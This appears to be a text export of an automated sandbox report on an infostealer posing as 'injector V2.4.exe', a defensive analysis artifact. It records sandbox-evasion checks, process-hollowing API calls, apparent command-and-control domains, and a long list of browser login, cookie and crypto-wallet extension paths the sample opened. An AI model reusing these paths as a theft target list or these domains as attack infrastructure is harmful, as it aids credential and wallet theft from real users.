            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_3_00537401 push ebp; iretd 4_3_00537402
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_3_0052F5BD push edi; retf 4_3_0052F5BF
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_3_00535C19 push eax; retf 0002h4_3_00535C1A
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_3_00535C19 push eax; retf 0002h4_3_00535C1A
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_3_00535C19 push eax; retf 0002h4_3_00535C1A
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_3_00537401 push ebp; iretd 4_3_00537402
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_3_00537401 push ebp; iretd 4_3_00537402
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_3_00537401 push ebp; iretd 4_3_00537402
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_3_0052F5BD push edi; retf 4_3_0052F5BF
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_3_00546842 push ecx; retf 4_3_00546868
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_3_00546842 push ecx; retf 4_3_00546868
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_3_00546842 push ecx; retf 4_3_00546868
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_3_0054164C push ebp; ret 4_3_00541650
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_3_0054164C push ebp; ret 4_3_00541650
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_3_00535C19 push eax; retf 0002h4_3_00535C1A
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_3_00535C19 push eax; retf 0002h4_3_00535C1A
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_3_00535C19 push eax; retf 0002h4_3_00535C1A
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_3_00537401 push ebp; iretd 4_3_00537402
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_3_00537401 push ebp; iretd 4_3_00537402
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_3_00537401 push ebp; iretd 4_3_00537402
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_3_0052F5BD push edi; retf 4_3_0052F5BF
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_3_00546842 push ecx; retf 4_3_00546868
            Source: injector V2.4.exeStatic PE information: section name: .text entropy: 6.9570693373870895
            Source: C:\Users\user\Desktop\injector V2.4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\injector V2.4.exeSystem information queried: FirmwareTableInformationJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exe TID: 2212Thread sleep time: -120000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exe TID: 2212Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_00B4F680 FindFirstFileExW,0_2_00B4F680
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_00B4F731 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00B4F731
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_00B4F680 FindFirstFileExW,3_2_00B4F680
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_00B4F731 FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_00B4F731
            Source: injector V2.4.exe, 00000004.00000003.2123229633.0000000004EFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: injector V2.4.exe, 00000004.00000003.2123229633.0000000004EFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
            Source: injector V2.4.exe, 00000004.00000003.2123229633.0000000004EFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: injector V2.4.exe, 00000004.00000003.2123229633.0000000004EFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: injector V2.4.exe, 00000004.00000003.2123229633.0000000004EFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
            Source: injector V2.4.exe, 00000004.00000003.2123229633.0000000004F05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
            Source: injector V2.4.exe, 00000004.00000003.2123229633.0000000004EFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: injector V2.4.exe, 00000004.00000002.2254512158.000000000049C000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2253728589.00000000004C9000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000002.2254512158.00000000004C9000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2253728589.000000000049C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: injector V2.4.exe, 00000004.00000003.2123229633.0000000004EFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: injector V2.4.exe, 00000004.00000003.2123229633.0000000004EFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: injector V2.4.exe, 00000004.00000003.2123229633.0000000004EFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: injector V2.4.exe, 00000004.00000003.2123229633.0000000004EFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: injector V2.4.exe, 00000004.00000003.2123229633.0000000004EFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: injector V2.4.exe, 00000004.00000003.2123229633.0000000004EFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: injector V2.4.exe, 00000004.00000003.2123229633.0000000004EFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: injector V2.4.exe, 00000004.00000003.2123229633.0000000004EFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
            Source: injector V2.4.exe, 00000004.00000003.2123229633.0000000004EFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: injector V2.4.exe, 00000004.00000003.2123229633.0000000004EFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: injector V2.4.exe, 00000004.00000003.2123229633.0000000004EFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
            Source: injector V2.4.exe, 00000004.00000003.2123229633.0000000004EFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: injector V2.4.exe, 00000004.00000003.2123229633.0000000004EFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: injector V2.4.exe, 00000004.00000003.2123229633.0000000004EFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
            Source: injector V2.4.exe, 00000004.00000003.2123229633.0000000004EFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
            Source: injector V2.4.exe, 00000004.00000003.2123229633.0000000004EFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: injector V2.4.exe, 00000004.00000003.2123229633.0000000004EFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: injector V2.4.exe, 00000004.00000003.2123229633.0000000004EFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
            Source: injector V2.4.exe, 00000004.00000003.2123229633.0000000004EFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: injector V2.4.exe, 00000004.00000003.2123229633.0000000004EFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
            Source: injector V2.4.exe, 00000004.00000003.2123229633.0000000004EFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: injector V2.4.exe, 00000004.00000003.2123229633.0000000004F05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YNVMware
            Source: injector V2.4.exe, 00000004.00000003.2123229633.0000000004EFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: injector V2.4.exe, 00000004.00000003.2123229633.0000000004EFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: injector V2.4.exe, 00000004.00000003.2123229633.0000000004EFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: injector V2.4.exe, 00000004.00000003.2123229633.0000000004EFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Users\user\Desktop\injector V2.4.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_0043E480 LdrInitializeThunk,4_2_0043E480
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_00B496AF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00B496AF
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_00B5D18D mov edi, dword ptr fs:[00000030h]0_2_00B5D18D
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_00B2D475 mov edi, dword ptr fs:[00000030h]0_2_00B2D475
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_00B2D07E mov edi, dword ptr fs:[00000030h]0_2_00B2D07E
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_00B32C40 mov eax, dword ptr fs:[00000030h]0_2_00B32C40
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_00B32C40 mov eax, dword ptr fs:[00000030h]0_2_00B32C40
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_00B2CD0A mov edi, dword ptr fs:[00000030h]0_2_00B2CD0A
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_00B2E93A mov edi, dword ptr fs:[00000030h]0_2_00B2E93A
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_00B2CD0A mov edi, dword ptr fs:[00000030h]0_2_00B2CD0A
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_00B2D6B8 mov edi, dword ptr fs:[00000030h]0_2_00B2D6B8
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_00B2D6B8 mov edi, dword ptr fs:[00000030h]0_2_00B2D6B8
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_00B2DA6C mov edi, dword ptr fs:[00000030h]0_2_00B2DA6C
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_00B32B9B mov eax, dword ptr fs:[00000030h]0_2_00B32B9B
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_00B32B9B mov eax, dword ptr fs:[00000030h]0_2_00B32B9B
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_00B2E350 mov edi, dword ptr fs:[00000030h]0_2_00B2E350
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_00B32AA0 mov eax, dword ptr fs:[00000030h]3_2_00B32AA0
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_00B32AA0 mov eax, dword ptr fs:[00000030h]3_2_00B32AA0
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_00B32AA0 mov eax, dword ptr fs:[00000030h]3_2_00B32AA0
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_00B32AA0 mov eax, dword ptr fs:[00000030h]3_2_00B32AA0
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_00B32AA0 mov eax, dword ptr fs:[00000030h]3_2_00B32AA0
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_00B2CCC0 mov edi, dword ptr fs:[00000030h]3_2_00B2CCC0
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_00B2CCC0 mov edi, dword ptr fs:[00000030h]3_2_00B2CCC0
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_00B2CCC0 mov edi, dword ptr fs:[00000030h]3_2_00B2CCC0
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_00B2CCC0 mov edi, dword ptr fs:[00000030h]3_2_00B2CCC0
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_00B2CCC0 mov edi, dword ptr fs:[00000030h]3_2_00B2CCC0
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_00B2CCC0 mov edi, dword ptr fs:[00000030h]3_2_00B2CCC0
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_00B2CCC0 mov edi, dword ptr fs:[00000030h]3_2_00B2CCC0
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_00B2CCC0 mov edi, dword ptr fs:[00000030h]3_2_00B2CCC0
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_00B4CB10 GetProcessHeap,0_2_00B4CB10
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_00B4902F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00B4902F
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_00B496A3 SetUnhandledExceptionFilter,0_2_00B496A3
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_00B496AF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00B496AF
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_00B4B79A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00B4B79A
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_00B4902F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00B4902F
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_00B496A3 SetUnhandledExceptionFilter,3_2_00B496A3
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_00B496AF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00B496AF
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_00B4B79A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00B4B79A

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_00B5D18D GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_00B5D18D
            Source: C:\Users\user\Desktop\injector V2.4.exeMemory written: C:\Users\user\Desktop\injector V2.4.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: injector V2.4.exe, 00000000.00000002.2053404503.0000000000999000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: p3ar11fter.sbs
            Source: injector V2.4.exe, 00000000.00000002.2053404503.0000000000999000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 3xp3cts1aim.sbs
            Source: injector V2.4.exe, 00000000.00000002.2053404503.0000000000999000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: peepburry828.sbs
            Source: injector V2.4.exe, 00000000.00000002.2053404503.0000000000999000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: p10tgrace.sbs
            Source: injector V2.4.exe, 00000000.00000002.2053404503.0000000000999000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: processhol.sbs
            Source: injector V2.4.exe, 00000000.00000002.2053404503.0000000000999000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: fumblingactor.cyou
            Source: C:\Users\user\Desktop\injector V2.4.exeProcess created: C:\Users\user\Desktop\injector V2.4.exe "C:\Users\user\Desktop\injector V2.4.exe"Jump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeProcess created: C:\Users\user\Desktop\injector V2.4.exe "C:\Users\user\Desktop\injector V2.4.exe"Jump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_00B498D5 cpuid 0_2_00B498D5
            Source: C:\Users\user\Desktop\injector V2.4.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_00B49566 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00B49566
            Source: C:\Users\user\Desktop\injector V2.4.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: injector V2.4.exe, 00000004.00000003.2253728589.00000000004B2000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000002.2254512158.00000000004B2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Users\user\Desktop\injector V2.4.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: injector V2.4.exe PID: 1492, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
            Source: C:\Users\user\Desktop\injector V2.4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
